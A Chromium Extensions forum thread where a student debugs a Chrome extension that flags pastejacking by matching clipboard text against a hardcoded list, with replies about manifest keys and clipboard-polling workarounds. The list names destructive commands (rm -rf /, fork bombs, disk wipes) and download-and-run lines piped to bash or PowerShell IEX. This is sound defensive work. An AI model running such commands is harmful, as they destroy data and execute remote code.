Chrome Extension Debugging

[Shreeganesh Jadhav]

So I'm making a chrome extension which basically reads the clipboard contents and then tries to match it with the values in the array which is located in background js file. If the content matches then it flags user with the popup. Actually it's my project for handling Pastejacking Vulnerability. 
 Here is my manifest file:
---------------------------------------------------------------------------------------------------
"manifest_version": 3,
    "name": "Anti PasteJacker",
    "description": "Detects malicious content copied to the clipboard.",
    "version": "1.0",
    "permissions": ["clipboardRead", "notifications"],
    "background": {
      "service_work er": "background.js",
      "type":"module"
    },
    "action": {
      "default_popup": "popup/popup.html",
      "default_icon": "images/hello_extensions.png"
    },
----------------------------------------------------------------------------------------------------------------

Here is background file :
----------------------------------------------------------------------------------------------
const maliciousContent = [
    "echo \"evil\"",
    "rm -rf /",
    ":(){ :|: & };:",
    "mkfs.ext3 /dev/sda",
    "wget -q -O- http://example.com/malicious.sh | bash",
    "chmod -R 777 /",
    "dd if=/dev/zero of=/dev/sda",
    "sudo userdel -r username",
    'echo "malicious_code" > ~/.bash_profile',
    "cat /dev/urandom > /dev/sda",
    "mv /bin/bash /bin/sh",
    "sudo mv /etc/sudoers /dev/null",
    'echo "malicious_code" >> /etc/rc.local',
    "curl http://example.com/malicious.sh | sudo sh",
    ":(){ :|:& };: > /dev/null",
    "sudo rm -rf / --no-preserve-root",
    'echo "malicious_code" > /etc/passwd',
    "cat /dev/zero > /dev/sda",
    "sudo mv /bin/su /bin/disable_su",
    "rm -rf ~",
    'echo "alias sudo=\'rm -rf /\'">>.bashrc',
    "wget -O /tmp/malicious.sh http://example.com/malicious.sh && chmod +x /tmp/malicious.sh && /tmp/malicious.sh",
    "curl -sSL http://example.com/malicious.sh | bash",
    "bash -c \"$(curl -fsSL http://example.com/malicious.sh)\"",
    "curl http://example.com/malicious.php | php",
    "powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://example.com/malicious.ps1')\"",
    "echo \"$(curl -fsSL http://example.com/malicious.sh)\" | bash"
   
];

function isMalicious(content) {
    return maliciousContent.includes(content);
}

function handleClipboardChange() {
    chrome.clipboard.readText(function(clipboardContent) {
        if (isMalicious(clipboardContent)) {
            chrome.notifications.create({
                type: "basic",
                iconUrl: "hello_extensions.png",
                title: "Malicious Content Detected",
                message: "Something malicious is copied to your clipboard. Please check it out."
            });
        }
    });
}

chrome.clipboard.onChanged.addListener(handleClipboardChange);
---------------------------------------------------------------------------------------------------
and here is my popup.html:
------------------------------------------------------------------------------
<body>
    <div class="popup-container">
        <h2>Malicious Content Detected</h2>
        <p>Something malicious is copied to your clipboard. Please check it out.</p>
        <button id="closeButton">Close</button>
    </div>
    <script src="popup.js"></script>
</body>

-----------------------------------------------------------------------------------
and here is my popup.js file:
--------------------------------------------------------------------
function closePopup() {
    window.close();
}
document.getElementById("closeButton").addEventListener("click", closePopup);
------------------------------------------------------------------------------
I'm  having trouble with the execution part:
1) I can't change the default favicon for the extension, even if i do so, it would lead to error in chrome://extension developer's mode
2) I can't load my backgroung.js file
It would be a great help if someone can debug this :) 

[Oliver Dunk]

Hi Shreeganesh,

For the favicon, the default_icon key should be set to a dictionary of sizes. You can see an example here: https://developer.chrome.com/docs/extensions/reference/api/action#manifest

For the background file, a couple of notes:

• In the files you shared here, the background.service_worker key has a space in it. Is this the case in your project?
• The chrome.clipboard API is only available on ChromeOS and only on certain channels like Canary. Do you meet these conditions?

I'm actually not sure off the top of my head how easy it would be to create something like this - clipboard APIs are slowly moving towards requiring document focus and it's gradually getting harder to use some of the workarounds that were available in the past.

I'm sure there might be some clever solutions, but I couldn't find any with a quick play just now I'm afraid.

Oliver Dunk | DevRel, Chrome Extensions | https://developer.chrome.com/ | London, GB

--
You received this message because you are subscribed to the Google Groups "Chromium Extensions" group.
To unsubscribe from this group and stop receiving emails from it, send an email to chromium-extens...@chromium.org.
To view this discussion on the web visit https://groups.google.com/a/chromium.org/d/msgid/chromium-extensions/de5582fa-8c50-4e86-80d5-6af51a7bad08n%40chromium.org.

[wOxxOm]

The only workaround for chrome.clipboard API is bad: polling the clipboard periodically in the offscreen document using document.execCommand('paste') in a textarea element (example) and send the result via a message to the background script. 

[wOxxOm]

BTW "default_icon" doesn't have to be a dictionary with sizes, it can be a string. Note that if you want to change the icon of the extension itself you need to specify "icons" object (more info), which is not a part of "action".

>  it would lead to error in chrome://extension developer's mode

What is the exact text of the error?

[Oliver Dunk]

BTW "default_icon" doesn't have to be a dictionary with sizes, it can be a string. Note that if you want to change the icon of the extension itself you need to specify "icons" object (more info), which is not a part of "action".

Oops, thanks! We should clarify that in the documentation. I thought it might be, but when I checked earlier I didn't see it anywhere and assumed I was making it up :)

The only workaround for chrome.clipboard API is bad: polling the clipboard periodically in the offscreen document using document.execCommand('paste') in a textarea element (example) and send the result via a message to the background script.

Have you been able to get this working? I tried that this morning and it didn't seem to work, I assume maybe a focus issue with offscreen documents. 

Oliver Dunk | DevRel, Chrome Extensions | https://developer.chrome.com/ | London, GB

[wOxxOm]

Works for me:

let el = document.body.appendChild(document.createElement("textarea"));
let val;
el.focus();
setInterval(() => {
  document.execCommand("paste");
  if (el.value !== val) alert(val = el.value);
  el.value = '';
}, 1000);

Maybe you didn't add clipboardRead permission?